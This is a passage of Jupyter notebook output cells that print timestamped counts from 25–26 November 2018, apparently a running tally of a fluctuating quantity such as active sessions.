"['2018-11-25 18:15:37.987978', 10]\n",
"['2018-11-25 18:15:47.137564', 9]\n",
"['2018-11-25 18:16:02.086093', 10]\n",
"['2018-11-25 18:18:06.264144', 6]\n",
"['2018-11-25 18:19:07.867012', 5]\n",
"['2018-11-25 18:20:41.352127', 2]\n",
"['2018-11-25 18:29:25.426306', 1]\n",
"['2018-11-25 18:29:33.378984', 2]\n",
"['2018-11-25 18:29:34.398916', 3]\n",
"['2018-11-25 18:34:33.695576', 1]\n",
"['2018-11-25 18:41:47.968679', 2]\n",
"['2018-11-25 18:42:48.127163', 3]\n",
"['2018-11-25 18:43:14.105249', 4]\n",
"['2018-11-25 18:43:52.538371', 5]\n",
"['2018-11-25 18:44:03.230773', 6]\n",
"['2018-11-25 18:44:05.598792', 7]\n",
"['2018-11-25 18:44:58.137186', 8]\n",
"['2018-11-25 18:45:21.008578', 9]\n",
"['2018-11-25 18:45:49.322199', 8]\n",
"['2018-11-25 18:47:12.487142', 7]\n",
"['2018-11-25 18:47:21.974659', 8]\n",
"['2018-11-25 18:48:06.985094', 7]\n",
"['2018-11-25 18:49:21.552027', 8]\n",
"['2018-11-25 18:50:52.055319', 7]\n",
"['2018-11-25 18:52:05.956030', 8]\n",
"['2018-11-25 18:53:28.938496', 9]\n",
"['2018-11-25 18:53:32.305484', 10]\n",
"['2018-11-25 18:53:41.458661', 11]\n",
"['2018-11-25 18:54:19.476815', 12]\n",
"['2018-11-25 18:56:15.128954', 11]\n",
"['2018-11-25 18:57:33.107177', 12]\n",
"['2018-11-25 18:57:50.028163', 10]\n",
"['2018-11-25 18:58:00.038280', 9]\n",
"['2018-11-25 18:59:02.689764', 10]\n",
"['2018-11-25 18:59:16.308802', 9]\n",
"['2018-11-25 19:00:40.188590', 8]\n",
"['2018-11-25 19:01:10.930322', 9]\n",
"['2018-11-25 19:01:20.218781', 8]\n",
"['2018-11-25 19:01:33.182384', 9]\n",
"['2018-11-25 19:01:37.832592', 8]\n",
"['2018-11-25 19:01:49.070708', 9]\n",
"['2018-11-25 19:03:20.348766', 8]\n",
"['2018-11-25 19:04:16.731758', 9]\n",
"['2018-11-25 19:05:27.516017', 8]\n",
"['2018-11-25 19:05:46.045992', 6]\n",
"['2018-11-25 19:06:58.917170', 5]\n",
"['2018-11-25 19:07:31.405925', 4]\n",
"['2018-11-25 19:07:36.329917', 5]\n",
"['2018-11-25 19:07:57.428662', 6]\n",
"['2018-11-25 19:08:06.595627', 7]\n",
"['2018-11-25 19:08:31.782159', 8]\n",
"['2018-11-25 19:08:33.336311', 9]\n",
"['2018-11-25 19:08:34.312723', 10]\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-25 19:08:34.567248', 11]\n",
"['2018-11-25 19:08:40.638682', 10]\n",
"['2018-11-25 19:08:59.280867', 11]\n",
"['2018-11-25 19:09:20.699380', 12]\n",
"['2018-11-25 19:11:30.995011', 11]\n",
"['2018-11-25 19:12:09.836429', 10]\n",
"['2018-11-25 19:12:36.820339', 9]\n",
"['2018-11-25 19:12:49.866604', 8]\n",
"['2018-11-25 19:15:39.961039', 7]\n",
"['2018-11-25 19:17:50.736062', 6]\n",
"['2018-11-25 19:18:03.606197', 7]\n",
"['2018-11-25 19:18:10.745448', 6]\n",
"['2018-11-25 19:19:00.766940', 5]\n",
"['2018-11-25 19:19:40.807901', 4]\n",
"['2018-11-25 19:20:52.693609', 5]\n",
"['2018-11-25 19:21:18.264846', 6]\n",
"['2018-11-25 19:21:41.872088', 7]\n",
"['2018-11-25 19:22:08.875308', 8]\n",
"['2018-11-25 19:22:20.925491', 7]\n",
"['2018-11-25 19:24:31.016645', 6]\n",
"['2018-11-25 19:26:26.628356', 5]\n",
"['2018-11-25 19:26:31.095817', 4]\n",
"['2018-11-25 19:26:51.116389', 3]\n",
"['2018-11-25 19:27:11.118273', 2]\n",
"['2018-11-25 19:28:03.317381', 3]\n",
"['2018-11-25 19:28:46.096639', 4]\n",
"['2018-11-25 19:29:00.912522', 5]\n",
"['2018-11-25 19:29:00.916646', 6]\n",
"['2018-11-25 19:30:14.158145', 7]\n",
"['2018-11-25 19:31:43.247711', 6]\n",
"['2018-11-25 19:33:08.227963', 5]\n",
"['2018-11-25 19:35:11.289931', 4]\n",
"['2018-11-25 19:39:40.203402', 1]\n",
"['2018-11-25 19:45:27.883057', 2]\n",
"['2018-11-25 19:46:12.645316', 3]\n",
"['2018-11-25 19:46:26.065684', 4]\n",
"['2018-11-25 19:49:48.444240', 3]\n",
"['2018-11-25 19:50:42.600375', 2]\n",
"['2018-11-25 19:53:38.392910', 3]\n",
"['2018-11-25 19:54:15.742957', 4]\n",
"['2018-11-25 19:54:30.774062', 5]\n",
"['2018-11-25 19:54:58.280194', 6]\n",
"['2018-11-25 19:55:02.209950', 7]\n",
"['2018-11-25 19:57:32.339295', 8]\n",
"['2018-11-25 19:58:02.437363', 6]\n",
"['2018-11-25 19:59:01.234921', 5]\n",
"['2018-11-25 19:59:42.495338', 4]\n",
"['2018-11-25 20:01:57.473201', 3]\n",
"['2018-11-25 20:05:56.530321', 4]\n",
"['2018-11-25 20:07:16.827969', 3]\n",
"['2018-11-25 20:07:31.212124', 4]\n",
"['2018-11-25 20:10:06.761832', 3]\n",
"['2018-11-25 20:17:15.484897', 1]\n",
"['2018-11-25 20:18:08.793401', 2]\n",
"['2018-11-26 04:50:28.510707', 1]\n",
"['2018-11-26 05:08:00.228086', 2]\n",
"['2018-11-26 05:08:59.340824', 3]\n",
"['2018-11-26 05:09:32.286176', 4]\n",
"['2018-11-26 05:12:12.563480', 5]\n",
"['2018-11-26 05:12:20.584585', 6]\n",
"['2018-11-26 05:14:06.742477', 5]\n",
"['2018-11-26 05:16:03.049372', 3]\n",
"['2018-11-26 05:17:38.888473', 2]\n",
"['2018-11-26 05:22:49.697577', 1]\n",
"['2018-11-26 05:25:01.053782', 2]\n",
"['2018-11-26 05:25:01.883692', 3]\n",
"['2018-11-26 05:26:01.818028', 4]\n",
"['2018-11-26 05:26:51.773045', 3]\n",
"['2018-11-26 05:27:58.962100', 4]\n",
"['2018-11-26 05:28:13.291940', 5]\n",
"['2018-11-26 05:30:44.409796', 4]\n",
"['2018-11-26 05:32:41.399009', 2]\n",
"['2018-11-26 05:35:56.300285', 3]\n",
"['2018-11-26 05:41:41.946496', 2]\n",
"['2018-11-26 06:00:34.266439', 1]\n",
"['2018-11-26 06:01:52.917100', 2]\n",
"['2018-11-26 06:03:59.076457', 3]\n",
"['2018-11-26 06:06:51.271213', 4]\n",
"['2018-11-26 06:09:59.906509', 2]\n",
"['2018-11-26 06:11:58.076326', 3]\n",
"['2018-11-26 06:12:57.614964', 4]\n",
"['2018-11-26 06:14:01.823293', 3]\n",
"['2018-11-26 06:16:04.576673', 2]\n",
"['2018-11-26 06:16:21.311337', 3]\n",
"['2018-11-26 06:18:14.367876', 2]\n",
"['2018-11-26 06:28:46.602603', 3]\n",
"['2018-11-26 06:29:21.563172', 4]\n",
"['2018-11-26 06:30:39.588972', 5]\n",
"['2018-11-26 06:31:46.179105', 6]\n",
"['2018-11-26 06:31:54.923416', 7]\n",
"['2018-11-26 06:31:54.927565', 8]\n",
"['2018-11-26 06:32:05.512879', 9]\n",
"['2018-11-26 06:33:23.105912', 8]\n",
"['2018-11-26 06:34:39.206059', 9]\n",
"['2018-11-26 06:34:55.625057', 10]\n",
"['2018-11-26 06:35:12.625235', 8]\n",
"['2018-11-26 06:36:51.448103', 7]\n",
"['2018-11-26 06:37:30.639758', 8]\n",
"['2018-11-26 06:38:03.919334', 9]\n",
"['2018-11-26 06:41:07.530623', 10]\n",
"['2018-11-26 06:41:09.685073', 11]\n",
"['2018-11-26 06:41:47.423843', 12]\n",
"['2018-11-26 06:42:24.859441', 13]\n",
"['2018-11-26 06:43:44.710416', 12]\n",
"['2018-11-26 06:44:39.150268', 11]\n",
"['2018-11-26 06:44:58.559256', 10]\n",
"['2018-11-26 06:45:25.797331', 8]\n",
"['2018-11-26 06:45:55.923595', 9]\n",
"['2018-11-26 06:47:11.022400', 8]\n",
"['2018-11-26 06:47:31.844249', 9]\n",
"['2018-11-26 06:48:29.024431', 10]\n",
"['2018-11-26 06:49:56.154315', 9]\n",
"['2018-11-26 06:50:04.867873', 10]\n",
"['2018-11-26 06:51:34.814859', 11]\n",
"['2018-11-26 06:51:56.193522', 10]\n",
"['2018-11-26 06:52:37.415791', 11]\n",
"['2018-11-26 06:53:29.149202', 12]\n",
"['2018-11-26 06:54:51.399145', 11]\n",
"['2018-11-26 06:55:08.254358', 10]\n",
"['2018-11-26 06:56:07.341188', 11]\n",
"['2018-11-26 06:56:31.717535', 10]\n",
"['2018-11-26 06:56:40.006257', 11]\n",
"['2018-11-26 06:58:10.698453', 10]\n",
"['2018-11-26 06:58:37.204297', 9]\n",
"['2018-11-26 06:58:45.649526', 8]\n",
"['2018-11-26 06:59:39.438497', 9]\n",
"['2018-11-26 06:59:39.580422', 10]\n",
"['2018-11-26 06:59:44.577463', 11]\n",
"['2018-11-26 06:59:59.642382', 12]\n",
"['2018-11-26 07:00:00.589585', 13]\n",
"['2018-11-26 07:00:09.583553', 12]\n",
"['2018-11-26 07:00:17.171225', 11]\n",
"['2018-11-26 07:00:43.057019', 10]\n",
"['2018-11-26 07:00:59.105853', 11]\n",
"['2018-11-26 07:02:10.038546', 12]\n",
"['2018-11-26 07:03:41.457046', 11]\n",
"['2018-11-26 07:04:54.528966', 7]\n",
"['2018-11-26 07:05:16.357422', 4]\n",
"['2018-11-26 07:05:22.069695', 5]\n",
"['2018-11-26 07:05:49.412819', 6]\n",
"['2018-11-26 07:06:11.026932', 7]\n",
"['2018-11-26 07:08:42.455784', 6]\n",
"['2018-11-26 07:09:22.549983', 5]\n",
"['2018-11-26 07:10:12.580886', 3]\n",
"['2018-11-26 07:12:10.437551', 4]\n",
"['2018-11-26 07:13:01.688459', 5]\n",
"['2018-11-26 07:13:20.324105', 6]\n",
"['2018-11-26 07:14:08.173207', 7]\n",
"['2018-11-26 07:15:36.834150', 8]\n",
"['2018-11-26 07:18:36.876494', 7]\n",
"['2018-11-26 07:19:27.648754', 6]\n",
"['2018-11-26 07:21:29.665217', 5]\n",
"['2018-11-26 07:23:40.425282', 1]\n",
"['2018-11-26 07:29:57.220558', 2]\n",
"['2018-11-26 07:30:34.760751', 3]\n",
"['2018-11-26 07:33:59.421474', 2]\n",
"['2018-11-26 07:34:57.598289', 3]\n",
"['2018-11-26 07:38:34.547478', 4]\n",
"['2018-11-26 07:39:56.495461', 5]\n",
"['2018-11-26 07:40:32.324376', 6]\n",
"['2018-11-26 07:42:04.838420', 7]\n",
"['2018-11-26 07:43:14.741624', 8]\n",
"['2018-11-26 07:44:35.987779', 6]\n",
"['2018-11-26 07:44:47.405366', 7]\n",
"['2018-11-26 07:44:58.559619', 8]\n",
"['2018-11-26 07:45:34.675092', 9]\n",
"['2018-11-26 07:46:04.843777', 8]\n",
"['2018-11-26 07:46:39.504913', 9]\n",
"['2018-11-26 07:46:55.844936', 10]\n",
"['2018-11-26 07:48:41.561708', 11]\n",
"['2018-11-26 07:48:50.543557', 12]\n",
"['2018-11-26 07:48:55.368301', 13]\n",
"['2018-11-26 07:50:06.654364', 14]\n",
"['2018-11-26 07:50:08.647512', 15]\n",
"['2018-11-26 07:50:24.979396', 16]\n",
"['2018-11-26 07:50:34.668904', 17]\n",
"['2018-11-26 07:51:01.195313', 18]\n",
"['2018-11-26 07:51:07.725222', 19]\n",
"['2018-11-26 07:51:19.188813', 20]\n",
"['2018-11-26 07:51:43.308681', 19]\n",
"['2018-11-26 07:52:53.608258', 18]\n",
"['2018-11-26 07:53:11.189149', 17]\n",
"['2018-11-26 07:53:25.563016', 16]\n",
"['2018-11-26 07:53:39.574292', 17]\n",
"['2018-11-26 07:54:07.170026', 16]\n",
"['2018-11-26 07:54:21.434893', 17]\n",
"['2018-11-26 07:54:28.974068', 18]\n",
"['2018-11-26 07:54:33.728680', 19]\n",
"['2018-11-26 07:54:36.593102', 18]\n",
"['2018-11-26 07:55:04.334452', 19]\n",
"['2018-11-26 07:55:34.688214', 20]\n",
"['2018-11-26 07:55:52.424176', 21]\n",
"['2018-11-26 07:55:54.035149', 22]\n",
"['2018-11-26 07:56:08.022810', 23]\n",
"['2018-11-26 07:57:52.324339', 22]\n",
"['2018-11-26 07:58:00.439240', 23]\n",
"['2018-11-26 07:58:03.884818', 24]\n",
"['2018-11-26 07:58:15.603593', 25]\n",
"['2018-11-26 07:58:25.939236', 24]\n",
"['2018-11-26 07:58:29.355496', 25]\n",
"['2018-11-26 07:58:34.824878', 23]\n",
"['2018-11-26 07:58:59.579708', 21]\n",
"['2018-11-26 07:59:04.363174', 20]\n",
"['2018-11-26 07:59:29.371621', 19]\n",
"['2018-11-26 07:59:35.386908', 18]\n",
"['2018-11-26 07:59:53.743244', 19]\n",
"['2018-11-26 07:59:58.812186', 17]\n",
"['2018-11-26 08:00:35.496123', 18]\n",
"['2018-11-26 08:00:49.891471', 19]\n",
"['2018-11-26 08:00:52.550967', 18]\n",
"['2018-11-26 08:01:02.589213', 17]\n",
"['2018-11-26 08:01:15.983885', 16]\n",
"['2018-11-26 08:01:55.789549', 14]\n",
"['2018-11-26 08:02:10.578743', 15]\n",
"['2018-11-26 08:02:16.470848', 16]\n",
"['2018-11-26 08:02:31.330772', 15]\n",
"['2018-11-26 08:03:00.696409', 14]\n",
"['2018-11-26 08:03:06.039473', 15]\n",
"['2018-11-26 08:04:27.426715', 14]\n",
"['2018-11-26 08:05:00.197848', 15]\n",
"['2018-11-26 08:05:30.240127', 14]\n",
"['2018-11-26 08:05:57.195430', 13]\n",
"['2018-11-26 08:06:29.157135', 11]\n",
"['2018-11-26 08:06:34.747068', 10]\n",
"['2018-11-26 08:07:58.997270', 8]\n",
"['2018-11-26 08:08:10.536341', 9]\n",
"['2018-11-26 08:08:15.853583', 10]\n",
"['2018-11-26 08:08:59.963522', 9]\n",
"['2018-11-26 08:09:10.718691', 10]\n",
"['2018-11-26 08:09:20.996446', 9]\n",
"['2018-11-26 08:10:00.988304', 8]\n",
"['2018-11-26 08:10:10.258359', 9]\n",
"['2018-11-26 08:12:14.179129', 8]\n",
"['2018-11-26 08:14:05.458506', 7]\n",
"['2018-11-26 08:16:43.771354', 8]\n",
"['2018-11-26 08:17:38.178343', 7]\n",
"['2018-11-26 08:18:11.379405', 6]\n",
"['2018-11-26 08:19:15.965539', 5]\n",
"['2018-11-26 08:20:02.054528', 4]\n",
"['2018-11-26 08:20:25.256436', 3]\n",
"['2018-11-26 08:22:57.055641', 4]\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-26 08:30:26.279142', 1]\n",
"['2018-11-26 08:34:24.964470', 2]\n",
"['2018-11-26 08:34:38.641310', 3]\n",
"['2018-11-26 08:35:40.159978', 4]\n",
"['2018-11-26 08:38:41.864900', 3]\n",
"['2018-11-26 08:38:51.871045', 2]\n",
"['2018-11-26 08:38:57.636732', 3]\n",
"['2018-11-26 08:39:48.974892', 4]\n",
"['2018-11-26 08:41:12.011647', 3]\n",
"['2018-11-26 08:41:47.185870', 4]\n",
"['2018-11-26 08:44:00.296508', 5]\n",
"['2018-11-26 08:44:05.375912', 6]\n",
"['2018-11-26 08:44:11.216718', 7]\n",
"['2018-11-26 08:44:44.457905', 8]\n",
"['2018-11-26 08:45:36.044150', 9]\n",
"['2018-11-26 08:46:02.272714', 8]\n",
"['2018-11-26 08:48:42.423310', 7]\n",
"['2018-11-26 08:48:42.866785', 8]\n",
"['2018-11-26 08:49:06.814098', 9]\n",
"['2018-11-26 08:50:00.401865', 10]\n",
"['2018-11-26 08:50:04.462650', 9]\n",
"['2018-11-26 08:51:13.341229', 8]\n",
"['2018-11-26 08:52:13.610296', 7]\n",
"['2018-11-26 08:52:16.228344', 8]\n",
"['2018-11-26 08:52:16.414267', 9]\n",
"['2018-11-26 08:52:24.121178', 10]\n",
"['2018-11-26 08:53:38.861151', 11]\n",
"['2018-11-26 08:53:40.120410', 12]\n",
"['2018-11-26 08:53:59.277363', 10]\n",
"['2018-11-26 08:54:01.215039', 11]\n",
"['2018-11-26 08:55:39.935649', 10]\n",
"['2018-11-26 08:57:34.688788', 11]\n",
"['2018-11-26 08:57:45.561136', 8]\n",
"['2018-11-26 08:58:14.296038', 6]\n",
"['2018-11-26 08:58:25.330113', 7]\n",
"['2018-11-26 08:58:29.092646', 8]\n",
"['2018-11-26 08:58:39.551740', 9]\n",
"['2018-11-26 08:59:15.384307', 8]\n",
"['2018-11-26 08:59:20.656292', 9]\n",
"['2018-11-26 08:59:40.726808', 7]\n",
"['2018-11-26 08:59:53.050096', 8]\n",
"['2018-11-26 09:01:59.014658', 9]\n",
"['2018-11-26 09:02:26.390594', 8]\n",
"['2018-11-26 09:02:34.377169', 7]\n",
"['2018-11-26 09:03:33.778571', 6]\n",
"['2018-11-26 09:04:01.582521', 7]\n",
"['2018-11-26 09:05:27.640869', 8]\n",
"['2018-11-26 09:05:35.868231', 7]\n",
"['2018-11-26 09:06:20.607252', 8]\n",
"['2018-11-26 09:06:45.471831', 9]\n",
"['2018-11-26 09:06:57.673918', 10]\n",
"['2018-11-26 09:07:05.072386', 7]\n",
"['2018-11-26 09:07:05.516171', 8]\n",
"['2018-11-26 09:07:09.981069', 9]\n",
"['2018-11-26 09:07:15.139320', 10]\n",
"['2018-11-26 09:08:31.757711', 11]\n",
"['2018-11-26 09:09:15.365937', 10]\n",
"['2018-11-26 09:09:42.245151', 11]\n",
"['2018-11-26 09:09:59.378573', 9]\n",
"['2018-11-26 09:11:00.153777', 7]\n",
"['2018-11-26 09:11:42.239508', 4]\n",
"['2018-11-26 09:13:36.736744', 5]\n",
"['2018-11-26 09:13:41.271604', 6]\n",
"['2018-11-26 09:13:45.037462', 7]\n",
"['2018-11-26 09:18:00.156029', 3]\n",
"['2018-11-26 09:20:08.162642', 1]\n",
"['2018-11-26 09:20:41.283587', 2]\n",
"['2018-11-26 09:28:37.244035', 1]\n",
"['2018-11-26 09:43:17.281394', 2]\n",
"['2018-11-26 09:44:38.670465', 1]\n",
"['2018-11-26 09:45:28.838418', 2]\n",
"['2018-11-26 09:51:13.035330', 3]\n",
"['2018-11-26 09:55:08.056008', 4]\n",
"['2018-11-26 09:55:23.444697', 3]\n",
"['2018-11-26 09:57:34.026852', 4]\n",
"['2018-11-26 09:58:09.657100', 5]\n",
"['2018-11-26 09:58:21.970578', 6]\n",
"['2018-11-26 09:58:43.544009', 7]\n",
"['2018-11-26 09:59:34.033266', 8]\n",
"['2018-11-26 10:00:10.509358', 9]\n",
"['2018-11-26 10:00:12.987522', 10]\n",
"['2018-11-26 10:00:37.978763', 11]\n",
"['2018-11-26 10:01:24.563376', 12]\n",
"['2018-11-26 10:02:20.994119', 11]\n",
"['2018-11-26 10:03:21.215156', 9]\n",
"['2018-11-26 10:03:56.266494', 10]\n",
"['2018-11-26 10:04:13.395791', 8]\n",
"['2018-11-26 10:04:21.862242', 7]\n",
"['2018-11-26 10:04:45.349068', 6]\n",
"['2018-11-26 10:05:47.357391', 5]\n",
"['2018-11-26 10:06:18.365140', 4]\n",
"['2018-11-26 10:07:11.671495', 5]\n",
"['2018-11-26 10:07:11.754540', 6]\n",
"['2018-11-26 10:07:27.170170', 7]\n",
"['2018-11-26 10:07:39.481723', 6]\n",
"['2018-11-26 10:09:17.605531', 5]\n",
"['2018-11-26 10:09:36.643607', 6]\n",
"['2018-11-26 10:11:30.481211', 4]\n",
"['2018-11-26 10:13:33.380254', 3]\n",
"['2018-11-26 10:15:00.347689', 1]\n",
"['2018-11-26 10:27:51.879942', 2]\n",
"['2018-11-26 10:29:17.615466', 3]\n",
"['2018-11-26 10:33:11.780816', 2]\n",
"['2018-11-26 10:34:57.608597', 1]\n",
"['2018-11-26 10:35:47.920351', 2]\n",
"['2018-11-26 10:40:23.479807', 1]\n",
"['2018-11-26 10:40:25.777030', 2]\n",
"['2018-11-26 10:44:22.442925', 3]\n",
"['2018-11-26 10:45:54.262862', 2]\n",
"['2018-11-26 10:46:46.444943', 1]\n",
"['2018-11-26 10:47:18.168849', 2]\n",
"['2018-11-26 10:50:19.738955', 3]\n",
"['2018-11-26 10:52:36.950490', 4]\n",
"['2018-11-26 10:53:39.055619', 5]\n",
"['2018-11-26 10:58:18.366772', 6]\n",
"['2018-11-26 10:59:49.853454', 7]\n",
"['2018-11-26 11:00:15.686262', 8]\n",
"['2018-11-26 11:00:20.586423', 9]\n",
"['2018-11-26 11:01:01.911726', 10]\n",
"['2018-11-26 11:01:06.492904', 11]\n",
"['2018-11-26 11:01:36.567525', 12]\n",
"['2018-11-26 11:01:38.523653', 13]\n",
"['2018-11-26 11:01:48.208770', 12]\n",
"['2018-11-26 11:01:51.647740', 13]\n",
"['2018-11-26 11:02:02.130454', 12]\n",
"['2018-11-26 11:03:12.026779', 13]\n",
"['2018-11-26 11:03:30.076112', 14]\n",
"['2018-11-26 11:03:51.651624', 12]\n",
"['2018-11-26 11:05:19.819080', 10]\n",
"['2018-11-26 11:05:44.362448', 9]\n",
"['2018-11-26 11:05:44.902928', 10]\n",
"['2018-11-26 11:05:53.043061', 11]\n",
"['2018-11-26 11:06:13.166105', 10]\n",
"['2018-11-26 11:06:14.519716', 11]\n",
"['2018-11-26 11:06:35.865415', 12]\n",
"['2018-11-26 11:07:29.210751', 13]\n",
"['2018-11-26 11:07:32.154031', 11]\n",
"['2018-11-26 11:07:37.210603', 12]\n",
"['2018-11-26 11:07:58.684001', 11]\n",
"['2018-11-26 11:08:06.257168', 10]\n",
"['2018-11-26 11:08:13.601488', 11]\n",
"['2018-11-26 11:08:32.516210', 10]\n",
"['2018-11-26 11:08:43.883831', 11]\n",
"['2018-11-26 11:09:07.884552', 12]\n",
"['2018-11-26 11:09:25.271912', 13]\n",
"['2018-11-26 11:09:31.886013', 14]\n",
"['2018-11-26 11:09:50.138254', 15]\n",
"['2018-11-26 11:10:20.860516', 14]\n",
"['2018-11-26 11:11:15.979924', 13]\n",
"['2018-11-26 11:12:07.292775', 14]\n",
"['2018-11-26 11:12:34.793082', 15]\n",
"['2018-11-26 11:12:37.582550', 16]\n",
"['2018-11-26 11:12:58.702053', 15]\n",
"['2018-11-26 11:13:02.179007', 16]\n",
"['2018-11-26 11:13:03.895861', 17]\n",
"['2018-11-26 11:13:14.177682', 18]\n",
"['2018-11-26 11:13:18.708249', 17]\n",
"['2018-11-26 11:13:38.656273', 18]\n",
"['2018-11-26 11:13:54.570931', 17]\n",
"['2018-11-26 11:13:59.507259', 16]\n",
"['2018-11-26 11:14:08.523871', 17]\n",
"['2018-11-26 11:14:43.240325', 18]\n",
"['2018-11-26 11:14:55.984175', 17]\n",
"['2018-11-26 11:15:20.842886', 16]\n",
"['2018-11-26 11:15:36.600648', 17]\n",
"['2018-11-26 11:16:03.791153', 16]\n",
"['2018-11-26 11:16:17.644475', 15]\n",
"['2018-11-26 11:16:34.877008', 14]\n",
"['2018-11-26 11:16:38.418252', 13]\n",
"['2018-11-26 11:16:46.443147', 12]\n",
"['2018-11-26 11:18:09.561004', 9]\n",
"['2018-11-26 11:19:30.596498', 7]\n",
"['2018-11-26 11:19:42.089891', 8]\n",
"['2018-11-26 11:20:11.482648', 6]\n",
"['2018-11-26 11:20:29.152281', 5]\n",
"['2018-11-26 11:20:52.289930', 6]\n",
"['2018-11-26 11:21:30.866182', 5]\n",
"['2018-11-26 11:22:06.967111', 6]\n",
"['2018-11-26 11:24:12.346726', 4]\n",
"['2018-11-26 11:25:39.132905', 3]\n",
"['2018-11-26 11:26:13.433425', 2]\n",
"['2018-11-26 11:27:55.237230', 3]\n",
"['2018-11-26 11:45:39.652722', 1]\n",
"['2018-11-26 11:49:28.050332', 2]\n",
"['2018-11-26 11:49:47.467816', 3]\n",
"['2018-11-26 11:51:05.004001', 4]\n",
"['2018-11-26 11:51:14.539823', 5]\n",
"['2018-11-26 11:52:42.050168', 6]\n",
"['2018-11-26 11:53:05.237872', 7]\n",
"['2018-11-26 11:54:34.210328', 8]\n",
"['2018-11-26 11:56:11.157975', 6]\n",
"['2018-11-26 11:56:34.701590', 7]\n",
"['2018-11-26 11:57:16.371632', 8]\n",
"['2018-11-26 11:57:51.613296', 9]\n",
"['2018-11-26 11:58:20.642099', 10]\n",
"['2018-11-26 11:58:45.405692', 11]\n",
"['2018-11-26 11:59:10.700214', 10]\n",
"['2018-11-26 11:59:50.124326', 11]\n",
"['2018-11-26 12:00:27.828697', 12]\n",
"['2018-11-26 12:00:29.540733', 13]\n",
"['2018-11-26 12:00:33.537386', 14]\n",
"['2018-11-26 12:00:34.122700', 15]\n",
"['2018-11-26 12:00:37.098320', 14]\n",
"['2018-11-26 12:00:46.576694', 15]\n",
"['2018-11-26 12:00:51.077067', 16]\n",
"['2018-11-26 12:00:55.617578', 17]\n",
"['2018-11-26 12:00:56.219921', 18]\n",
"['2018-11-26 12:01:17.828873', 19]\n",
"['2018-11-26 12:01:27.938361', 20]\n",
"['2018-11-26 12:02:29.011204', 19]\n",
"['2018-11-26 12:02:34.831433', 20]\n",
"['2018-11-26 12:03:46.997615', 19]\n",
"['2018-11-26 12:04:05.203526', 20]\n",
"['2018-11-26 12:04:16.444414', 21]\n",
"['2018-11-26 12:04:37.136870', 18]\n",
"['2018-11-26 12:04:56.415884', 17]\n",
"['2018-11-26 12:05:57.045573', 8]\n",
"['2018-11-26 12:06:08.064910', 9]\n",
"['2018-11-26 12:06:11.429560', 10]\n",
"['2018-11-26 12:06:12.122405', 11]\n",
"['2018-11-26 12:06:14.654470', 12]\n",
"['2018-11-26 12:07:36.113899', 11]\n",
"['2018-11-26 12:07:50.762142', 12]\n",
"['2018-11-26 12:08:01.490761', 11]\n",
"['2018-11-26 12:08:20.354845', 10]\n",
"['2018-11-26 12:08:50.432112', 11]\n",
"['2018-11-26 12:09:18.278398', 12]\n",
"['2018-11-26 12:09:30.103354', 13]\n",
"['2018-11-26 12:10:19.128504', 9]\n",
"['2018-11-26 12:10:59.595186', 10]\n",
"['2018-11-26 12:10:59.884096', 11]\n",
"['2018-11-26 12:11:06.637360', 12]\n",
"['2018-11-26 12:11:28.862909', 13]\n",
"['2018-11-26 12:11:55.783248', 12]\n",
"['2018-11-26 12:13:16.998365', 11]\n",
"['2018-11-26 12:13:24.414371', 12]\n",
"['2018-11-26 12:13:50.987166', 13]\n",
"['2018-11-26 12:15:03.519666', 11]\n",
"['2018-11-26 12:15:21.304591', 12]\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-26 12:15:29.144760', 11]\n",
"['2018-11-26 12:15:39.069112', 10]\n",
"['2018-11-26 12:17:29.271198', 9]\n",
"['2018-11-26 12:17:39.270497', 8]\n",
"['2018-11-26 12:19:39.394761', 7]\n",
"['2018-11-26 12:20:16.293399', 8]\n",
"['2018-11-26 12:21:49.654347', 7]\n",
"['2018-11-26 12:23:34.220571', 6]\n",
"['2018-11-26 12:24:02.643007', 5]\n",
"['2018-11-26 12:24:59.517873', 4]\n",
"['2018-11-26 12:25:12.612019', 3]\n",
"['2018-11-26 12:25:27.249573', 4]\n",
"['2018-11-26 12:27:16.206126', 3]\n",
"['2018-11-26 12:28:53.307099', 4]\n",
"['2018-11-26 12:29:26.428273', 3]\n",
"['2018-11-26 12:29:29.905512', 2]\n",
"['2018-11-26 12:29:38.730789', 3]\n",
"['2018-11-26 12:29:45.458405', 4]\n",
"['2018-11-26 12:34:01.698630', 2]\n",
"['2018-11-26 12:39:10.775083', 1]\n",
"['2018-11-26 12:41:54.054678', 2]\n",
"['2018-11-26 12:49:53.742778', 3]\n",
"['2018-11-26 12:50:44.312570', 4]\n",
"['2018-11-26 12:52:59.038585', 3]\n",
"['2018-11-26 12:53:21.233261', 4]\n",
"['2018-11-26 12:55:08.650439', 5]\n",
"['2018-11-26 12:55:18.068073', 6]\n",
"['2018-11-26 12:55:45.248515', 7]\n",
"['2018-11-26 12:56:13.004509', 8]\n",
"['2018-11-26 12:56:38.379555', 9]\n",
"['2018-11-26 12:56:56.655465', 10]\n",
"['2018-11-26 12:56:59.089719', 9]\n",
"['2018-11-26 12:56:59.647279', 10]\n",
"['2018-11-26 12:57:49.315220', 9]\n",
"['2018-11-26 12:58:10.866436', 8]\n",
"['2018-11-26 12:58:14.994215', 9]\n",
"['2018-11-26 12:58:19.959066', 10]\n",
"['2018-11-26 12:58:24.243135', 11]\n",
"['2018-11-26 12:59:48.142940', 10]\n",
"['2018-11-26 13:01:02.663250', 9]\n",
"['2018-11-26 13:01:21.155877', 8]\n",
"['2018-11-26 13:01:31.155915', 7]\n",
"['2018-11-26 13:01:40.534631', 8]\n",
"['2018-11-26 13:01:46.660345', 9]\n",
"['2018-11-26 13:01:51.166295', 8]\n",
"['2018-11-26 13:02:01.176617', 7]\n",
"['2018-11-26 13:02:07.908658', 8]\n",
"['2018-11-26 13:02:57.616660', 6]\n",
"['2018-11-26 13:02:58.749288', 7]\n",
"['2018-11-26 13:03:28.599120', 8]\n",
"['2018-11-26 13:03:52.144484', 9]\n",
"['2018-11-26 13:04:30.032166', 10]\n",
"['2018-11-26 13:04:59.643399', 11]\n",
"['2018-11-26 13:05:18.909699', 10]\n",
"['2018-11-26 13:05:28.307537', 11]\n",
"['2018-11-26 13:06:27.870336', 8]\n",
"['2018-11-26 13:06:51.419406', 9]\n",
"['2018-11-26 13:07:15.312113', 7]\n",
"['2018-11-26 13:07:36.834245', 8]\n",
"['2018-11-26 13:07:43.479888', 9]\n",
"['2018-11-26 13:08:05.590308', 8]\n",
"['2018-11-26 13:08:25.833277', 9]\n",
"['2018-11-26 13:08:43.128122', 10]\n",
